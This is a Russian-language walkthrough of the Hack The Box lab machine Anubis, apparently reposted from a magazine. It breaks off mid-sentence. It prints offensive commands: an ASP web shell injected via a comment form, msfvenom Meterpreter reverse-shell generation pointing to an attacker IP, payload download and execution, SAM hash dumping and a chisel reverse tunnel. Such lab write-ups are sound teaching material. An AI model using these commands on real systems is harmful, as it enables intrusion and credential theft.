Категория > Новости > HTB Anubis. Захватываем домен через сертификаты Active Directory - «Новости»
HTB Anubis. Захватываем домен через сертификаты Active Directory - «Новости»5-02-2022, 00:00. Автор: Flatcher |
Hack The Box. Чтобы пройти ее, понадобится проэксплуатировать RCE на сайте и так получить доступ к контейнеру, затем найти утечку хеша и узнать пароль. Для доступа к основной системе заюзаем уязвимость в Jamovi. А под конец — компрометация домена через службу сертификации Active Directory. В общем, полный набор! Скучно не будет, обещаю.warningПодключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками. Разведка. Сканирование портовДобавляем IP-адрес машины в
10.10.11.102 anubis.htb
И запускаем сканирование портов. Справка: сканирование портовСканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа. Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта. ports=$(nmap -p- --min-rate=500 $1 | grep^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -p$ports -A $1 Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция Результат работы скрипта Находим четыре открытых порта:
Порт 443 обеспечивает соединение по HTTPS, а это значит, что первым делом стоит изучить сертификат. Его поле
10.10.11.102 www.windcorp.htb
Теперь перейдем к веб‑серверу, где нас встретит одностраничный сайт. Главная страница сайта Нам нужны поля, через которые можно было бы взаимодействовать с сервером. Найденная форма отправки сообщений подойдет. Форма отправки сообщений Что привлекло мое внимание — это отображение всех введенных данных на странице Форма подтверждения данных Получается, что сайт не одностраничный! Давай попробуем найти другие скрытые страницы сайта. Справка: сканирование веба c ffufОдно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch и DIRB. Я предпочитаю легкий и очень быстрый ffuf. При запуске указываем следующие параметры:
Так как уже обнаружена одна страница в формате ASP, остальные будем перебирать с таким же расширением. Запускаем ffuf:
ffuf -uhttps://www.windcorp.htb/FUZZ.asp -t 300 -wdirectory_2.3_medium_lowercase.txt
Результат сканирования файлов ASPСпустя несколько минут мы узнаем еще о нескольких страницах. Самая интересная из них — Страница test.asp Это место для теста! Захват контейнераТак как данные попадают в исполняемый файл ASP, то самая простая идея — это попробовать записать в поле комментария какой‑нибудь шелл на ASP. К примеру, этот: Set oScript = Server.CreateObject("WSCRIPT.SHELL")Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")Function getCommandOutput(theCommand) Отправка веб‑шеллаИ уже на странице подтверждения видим некоторый вывод. Неплохо, одну уязвимую страницу уже нашли! Страница подтверждения отправленного комментария Конечно, удобнее всего получить какую‑нибудь продвинутую оболочку, к примеру Meretpreter. Сначала сгенерируем исполняемый файл с помощью
msfvenom -pwindows/x64/meterpreter/reverse_http LHOST=10.10.14.13 LPORT=443 -f exe -ors.exe
Генерирование нагрузки MeterpreterСледующий шаг — запуск листенера MSF.
msfconsole -q
handler -pwindows/x64/meterpreter/reverse_http -Htun0 -P 443
Запуск листенера MetasploitИз каталога, где находится файл с нагрузкой, запускаем простой веб‑сервер на основе Python 3.
python3 -mhttp.server 80
И через веб‑шелл скачиваем нашу нагрузку, а второй командой — запускаем. Это приведет к созданию сессии Meterpreter в Metasploit. Командой cmd.exe/cC:WindowsTemprs.exe Создание сессии MeterpreterМы работаем в контексте System, а для дальнейшего продвижения могут понадобиться учетные данные. Дампим хеши из локальной базы SAM с помощью hashdump, вдруг где‑то пригодится. Получение хешей паролей из базы SAM ПродвижениеПоиск хостов Просматриваем файлы на хосте и находим на рабочем столе администратора сертификат. Содержимое файла req.txt Копируем его содержимое на локальную машину и сохраняем с расширением Содержимое сертификата Так мы узнаем еще одно доменное имя —
./chisel server -p4321 --socks5 --reverse
Затем загрузим на удаленный хост версию для Windows и подключимся. В логах сервера увидим сообщение о подключении клиентской части. Логи сервера chiselТеперь добавим доменное имя в файл Результат команды ipconfig
172.22.160.1 softwareportal.windcorp.htb
Что удивительно, расширения для быстрого переключения прокси серверов типа FoxyProxy и ему подобных не давали соединения. Но если выставить параметры прокси в настройках браузера и обратиться к хосту по доменному имени, мы получаем желанную страницу. Настройки прокси в браузереСтартовая страница сайта На сайте есть список программного обеспечения. Если выбрать любой пункт, ты перейдешь по ссылке и увидишь сообщение о начале установки ПО. Сообщение о начале установки ПО Немного ждем, но не видим никаких изменений. Тогда разберем, что происходит при выборе ПО из списка. Выбирая ссылку, мы делаем запрос по такому адресу:
http://softwareportal.windcorp.htb/install.asp?client=XXX.XXX.XXX.XXX&software=7z1900-x64.exe
Сервер получает адрес клиента и должен с ним взаимодействовать. Попробуем в качестве клиента указать адрес своего хоста, но перед этим откроем любой сниффер трафика, к примеру Wireshark.
curl http://softwareportal.windcorp.htb/install.asp?client=10.10.14.81&software=7z1900-x64.exe
Окно WiresharkДля удобства просмотра трафика можно активировать фильтр, я использовал Перейти обратно к новости |